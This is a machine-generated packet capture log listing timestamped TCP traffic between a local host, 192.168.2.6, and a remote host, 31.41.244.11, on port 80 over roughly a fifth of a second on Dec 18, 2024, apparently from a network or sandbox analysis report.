                                                                                                                                                                  Dec 18, 2024 11:09:47.020440102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.020621061 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.021301985 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.021349907 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.021625996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.022124052 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.022192955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.022238016 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.022681952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.023065090 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.023138046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.023207903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.023689985 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.023736954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.024265051 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.024319887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.024759054 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.025811911 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.025824070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.025835991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.025865078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.025882959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.026870966 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.027255058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.027302980 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.027856112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.027925014 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.028232098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.028276920 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.028878927 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.029083014 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.029246092 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.029321909 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.029894114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.029959917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.030230999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.030276060 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.031012058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.031228065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.031272888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.031989098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.032201052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.032252073 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.033247948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.033287048 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.033299923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.033335924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.034250975 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.034296989 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.034658909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.034739017 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.035155058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.035204887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.035371065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.035413980 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.036222935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.036395073 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.036439896 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.037168980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.037540913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.037587881 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.038150072 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.038196087 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.038479090 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.038528919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.039191961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.039235115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.039329052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.039376974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.040216923 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.040471077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.040497065 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.040513992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.041239023 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.041259050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.041309118 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.042340040 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.042412043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.042459965 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.043297052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.043337107 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.043612003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.043721914 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.044327974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.044374943 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.044706106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.044754982 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.045370102 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.045413971 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.045527935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.045576096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.046407938 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.046593904 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.046643019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.047409058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.047509909 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.047544956 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.048278093 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.048486948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.048578978 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.048669100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.048717022 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.049622059 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.049715042 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.049932957 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.049984932 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.050492048 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.050571918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.050616980 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.051557064 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.051695108 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.051737070 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.052591085 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.052634954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.052704096 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.053575993 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.053621054 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.053888083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.053926945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.054588079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.054626942 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.054804087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.054850101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.055799961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.055845022 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.056727886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.056749105 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.056783915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.056783915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.056812048 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.056852102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.057885885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.057929039 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.058397055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.058435917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.058842897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.058881044 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.059369087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.059412003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.059559107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.059570074 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.059598923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.060502052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.060547113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.060990095 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.061034918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.061528921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.061572075 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.198823929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.198901892 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.198955059 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.198995113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.199269056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.199320078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.199404955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.199443102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.200350046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.200395107 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.201097012 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.201142073 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.201380014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.201394081 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.201422930 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.201442003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.202393055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.202440023 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.203193903 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.203239918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.203489065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.203500032 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.203552008 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.204480886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.204530954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.205017090 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.205068111 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.205465078 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.205492973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.205509901 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.205530882 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.206505060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.206549883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.206669092 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.206711054 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.207518101 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.207562923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.208261013 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.208302975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.208595037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.208637953 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.208709955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.208753109 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.209605932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.209651947 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.210175037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.210218906 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.210673094 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.210684061 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.210717916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.211671114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.211718082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.212052107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.212095976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.212666988 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.212719917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.212879896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.212923050 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.213685989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.213730097 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.214191914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.214246988 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.214797020 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.214808941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.214849949 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.215776920 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.215825081 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.216108084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.216154099 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.216917038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.216964006 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.216988087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.217027903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.218170881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.218218088 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.218261003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.218302965 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.219496012 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.219542980 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.220098972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.220144987 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.220918894 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.220963955 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.221358061 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.221400023 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.222136974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.222182035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.223165035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.223205090 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.223598003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.223611116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.223645926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.224685907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.224734068 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.225090981 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.225136042 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.225224018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.225235939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.225265026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.225873947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.225919962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.226200104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.226243973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.226562977 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.226607084 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.226969004 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.227011919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.227499962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.227514029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.227544069 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.227555037 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.228332996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.228377104 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.228415012 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.228456974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.229166031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.229212046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.229367971 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.229424953 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.230200052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.230245113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.230284929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.230325937 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.231246948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.231297970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.231924057 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.231967926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.232285976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.232328892 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.232347965 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.232389927 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.233282089 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.233328104 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.233452082 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.233494043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.234288931 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.234333992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.234394073 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.234436035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.235337019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.235362053 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.235385895 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.235404968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.236394882 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.236442089 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.236442089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.236480951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.237452030 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.237499952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.237551928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.237592936 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.238460064 CET804996631.41.244.11192.168.2.6
